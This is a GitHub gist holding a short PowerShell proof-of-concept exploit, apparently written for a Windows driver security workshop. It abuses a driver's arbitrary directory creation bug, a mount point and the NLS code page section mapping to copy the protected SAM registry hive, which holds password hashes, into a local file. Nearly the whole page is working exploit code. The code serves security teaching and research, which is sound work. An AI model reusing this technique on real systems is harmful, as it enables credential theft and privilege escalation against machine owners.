-
-
Save tyranid/221bf08dd3ddb88ec33d2573a83482d0 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Simple example when combined with an arbitrary directory creation | |
# vulnerability to read out the SAM registry hive file. | |
# Written by James Forshaw 2017 | |
Import-Module NtObjectManager | |
# Get an IOCTL for the workshop driver. | |
function Get-DriverIoCtl | |
{ | |
Param([int]$ControlCode) | |
[NtApiDotNet.NtIoControlCode]::new("Unknown",` | |
0x800 -bor $ControlCode, "Buffered", "Any") | |
} | |
function New-Directory { | |
Param([string]$Filename) | |
# Open the device driver. | |
Use-NtObject($file = Get-NtFile \Device\WorkshopDriver) { | |
# Get IOCTL for ControlCreateDir (2) | |
$ioctl = Get-DriverIoCtl -ControlCode 2 | |
# Convert DOS filename to NT | |
$bytes = [Text.Encoding]::Unicode.GetBytes($Filename) | |
$file.DeviceIoControl($ioctl, $bytes, 0) | Out-Null | |
} | |
} | |
function Remove-Directory { | |
Param([string]$Filename) | |
try { | |
Use-NtObject($file = Get-NtFile $Filename ` | |
-Access Delete ` | |
-Options DeleteOnClose,OpenReparsePoint,DirectoryFile) { | |
} | |
} catch { | |
} | |
} | |
try { | |
# We'll use the CP 1337 file. | |
$dir = "\SystemRoot\system32\c_1337.nls" | |
Remove-Directory $dir | |
# Create new directory. | |
New-Directory $dir | |
# Set directory as a mount point to the SAM hive file. | |
$target_path = "\SystemRoot\system32\config\SAM" | |
Use-NtObject($file = Get-NtFile $dir -Options OpenReparsePoint,DirectoryFile) { | |
$file.SetMountPoint($target_path, $target_path) | |
} | |
# Get mapped file and write it to sam.bin | |
Use-NtObject($map = [NtApiDotNet.NtLocale]::GetNlsSectionPtr("CodePage", 1337)) { | |
Use-NtObject($output = [IO.File]::OpenWrite("sam.bin")) { | |
$map.GetStream().CopyTo($output) | |
Write-Host "Copied file" | |
} | |
} | |
# Delete section object. | |
Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 ` | |
-Access Delete) { | |
$sect.MakeTemporary() | |
} | |
Remove-Directory $dir | |
} catch { | |
Write-Host $_ | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
in line 1, 'direction' should be 'directory' I believe